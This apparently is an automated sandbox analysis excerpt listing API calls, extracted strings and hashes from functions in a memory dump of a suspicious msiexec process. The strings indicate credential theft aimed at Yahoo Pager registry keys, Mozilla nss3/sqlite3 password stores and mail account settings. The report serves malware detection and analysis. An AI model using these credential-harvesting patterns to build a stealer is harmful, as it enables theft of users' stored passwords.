                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$memcpy
                                                                    • String ID:
                                                                    • API String ID: 368790112-0
                                                                    • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                    • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                    • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                    • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                    APIs
                                                                    • __allrem.LIBCMT ref: 00425850
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                    • __allrem.LIBCMT ref: 00425933
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 1992179935-0
                                                                    • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                    • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                    • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                    • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                    APIs
                                                                    Strings
                                                                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                    • too many SQL variables, xrefs: 0042C6FD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                    • API String ID: 2221118986-515162456
                                                                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                    APIs
                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                    • memset.MSVCRT ref: 004026AD
                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                      • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                      • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                    • LocalFree.KERNEL32(?), ref: 004027A6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                    • String ID:
                                                                    • API String ID: 3503910906-0
                                                                    • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                    • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                    • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                    • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C922
                                                                    • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                    • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                    • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Message$MenuPostSendStringmemset
                                                                    • String ID:
                                                                    • API String ID: 3798638045-0
                                                                    • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                    • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                    • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                    • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                    APIs
                                                                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                    • strlen.MSVCRT ref: 0040B60B
                                                                    • atoi.MSVCRT(?), ref: 0040B619
                                                                    • _mbsicmp.MSVCRT ref: 0040B66C
                                                                    • _mbsicmp.MSVCRT ref: 0040B67F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                    • String ID:
                                                                    • API String ID: 4107816708-0
                                                                    • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                    • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                    • _gmtime64.MSVCRT ref: 00411437
                                                                    • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                    • strftime.MSVCRT ref: 00411476
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                    • String ID:
                                                                    • API String ID: 1886415126-0
                                                                    • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                    • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                    • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                    • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: strlen
                                                                    • String ID: >$>$>
                                                                    • API String ID: 39653677-3911187716
                                                                    • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                    • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                    • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: @
                                                                    • API String ID: 3510742995-2766056989
                                                                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strcmpi
                                                                    • String ID: C@$mail.identity
                                                                    • API String ID: 1439213657-721921413
                                                                    • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                    • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00444573
                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValuememset
                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                    • API String ID: 3363972335-1703613266
                                                                    • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                    • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00406640
                                                                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                    • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                    • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset$memcmp
                                                                    • String ID: Ul@
                                                                    • API String ID: 270934217-715280498
                                                                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                    APIs
                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                    • sprintf.MSVCRT ref: 0040B929
                                                                    • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                    • sprintf.MSVCRT ref: 0040B953
                                                                    • _mbscat.MSVCRT ref: 0040B966
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                    • String ID:
                                                                    • API String ID: 203655857-0
                                                                    • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                    • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                    • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                    • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                    APIs
                                                                      • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                    Strings
                                                                    • recovered %d pages from %s, xrefs: 004188B4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                    • String ID: recovered %d pages from %s
                                                                    • API String ID: 985450955-1623757624
                                                                    • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                    • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                    • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                    • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _ultoasprintf
                                                                    • String ID: %s %s %s
                                                                    • API String ID: 432394123-3850900253
                                                                    • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                    • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00409919
                                                                    • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendmemset
                                                                    • String ID: N\@
                                                                    • API String ID: 568519121-3851889168
                                                                    • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                    • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                    • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                    • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                    APIs
                                                                    • LoadMenuA.USER32(00000000), ref: 00409078
                                                                    • sprintf.MSVCRT ref: 0040909B
                                                                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                    • String ID: menu_%d
                                                                    • API String ID: 1129539653-2417748251
                                                                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                    APIs
                                                                    Strings
                                                                    • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _msizerealloc
                                                                    • String ID: failed memory resize %u to %u bytes
                                                                    • API String ID: 2713192863-2134078882
                                                                    APIs
                                                                      • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                    • strrchr.MSVCRT ref: 00409808
                                                                    • _mbscat.MSVCRT ref: 0040981D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName_mbscatstrrchr
                                                                    • String ID: _lng.ini
                                                                    • API String ID: 3334749609-1948609170
                                                                    APIs
                                                                    • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                    • _mbscat.MSVCRT ref: 004070FA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscat$_mbscpystrlen
                                                                    • String ID: sqlite3.dll
                                                                    • API String ID: 1983510840-1155512374
                                                                    APIs
                                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileString
                                                                    • String ID: A4@$Server Details
                                                                    • API String ID: 1096422788-4071850762
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                    • memset.MSVCRT ref: 0042C932
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID:
                                                                    • API String ID: 438689982-0
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0040849A
                                                                    • memset.MSVCRT ref: 004084D2
                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,67CE7B60,?,00000000), ref: 0040858F
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,67CE7B60,?,00000000), ref: 004085BA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 3110682361-0
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID:
                                                                    • API String ID: 3510742995-0
                                                                    APIs
                                                                      • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099A3
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099CC
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099ED
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 00409A0E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$memset
                                                                    • String ID:
                                                                    • API String ID: 1860491036-0
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0040797A
                                                                    • free.MSVCRT ref: 0040799A
                                                                      • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                      • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                      • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                    • free.MSVCRT ref: 004079BD
                                                                    • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocstrlen
                                                                    • String ID:
                                                                    • API String ID: 3669619086-0
                                                                    • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                    • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                    • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                    • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59